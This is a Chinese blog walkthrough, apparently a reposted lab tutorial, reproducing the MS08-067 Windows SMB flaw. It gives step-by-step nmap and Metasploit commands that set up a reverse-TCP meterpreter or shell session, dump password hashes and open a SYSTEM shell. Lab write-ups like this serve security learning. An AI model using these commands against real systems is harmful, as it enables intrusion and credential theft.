必威体育Betway必威体育官网
当前位置:首页 > IT技术

ms08-067漏洞复现与利用

时间:2019-08-20 15:12:08来源:IT技术作者:seo实验室小编阅读:63次「手机版」
 

ms08-067

一.实验环境搭建

1.靶机:一台有漏洞windows xp 2002                           ip:192.168.0.116

2.攻击机:一台kail liunx                                                   ip:192.168.0.110

二.开始复现

1.使用nmap工具进行扫描确认存在漏洞,nmap -n -p445 --script smb-vuln-ms08-067 192.168.0.116 --open (小伙子的nmap是7.4)

2.打开神器metasploit,终端输入:msfconsole

3.搜索漏洞,search ms08-067

4.使用模块,use exploit/windows/smb/ms08_067_netapi

5.查看需要设置的参数,show options

6.设置靶机ip,set RHOST 192.168.0.116

7.设置payload,set payload windows/meterpreter/reverse_tcp

8.查看参数设置,这里需要设置攻击机ip,show options

9.设置本地ip,set LHOST 192.168.0.110

10.target系统默认是自动定位,如果需要精确的话,可以show targets查看所有,然后进行选择,set target x,这里小伙子就默认了

11.运行exploit,成功获取到sessions

12.输入ps,查看进程

13.查询用户id和工作目录,pwd,是system

14.抓取本地hash(这个功能好像只有是管理员以上才可以使用)

15.输入shell,来到cmd模式

三.介绍这个模块的另外一个payload

1.还是使用这个攻击模块,use exploit/windows/smb/ms08_067_netapi

2.设置参数

set payload windows/shell/reverse_tcppayload  设置payload

set RHOST 192.168.0.116        设置靶机ip

set LHOST 192.168.0.110        设置攻击机ip

3.检查参数是否有错,show options(target也是默认就好)

4.运行,exploit,直接获取一个shell

感谢各位大佬赏脸,有什么不足的地方请多多指教,欢迎意见轰炸,谢谢!!!

相关阅读

[渗透]kindeditor4.1.5文件上传漏洞

漏洞等级:高危 Kindeditor是一套开源的HTML可视化编辑器,主要用于让用户在网站上获得所见即所得编辑效果,兼容IE、Firefox、Chrome、

DTMF信号的分离——关于一篇博客文章的复现(二)

上一回,我们阐述了一下我们的目标以及整理了一下我们的解决方案。接下来就需要上代码了。不过在此之前,有几点我需要说明一下: 1、由

谈谈微信支付曝出的漏洞

一、背景昨天(2018-07-04)微信支付的SDK曝出重大漏洞(XXE漏洞),通过该漏洞,攻击者可以获取服务器中目录结构、文件内容,如代码、各种私钥

云安全行业思考 | 在线漏洞扫描的未来在哪里?

入行云安全有快两年了,从最开始的不懂安全一脸懵懂,到现在略微能对行业“指点”一二,感触良多。本文重点讲一讲在线漏洞扫描服务以及

常见的Web漏洞——XSS

XSS简介 XSS是跨站脚本攻击(Cross Site Scripting)的简写,为了不与层叠样式表混淆而改写的。此漏洞也是网站存在相当多的漏洞,仅次

分享到:

栏目导航

推荐阅读

热门阅读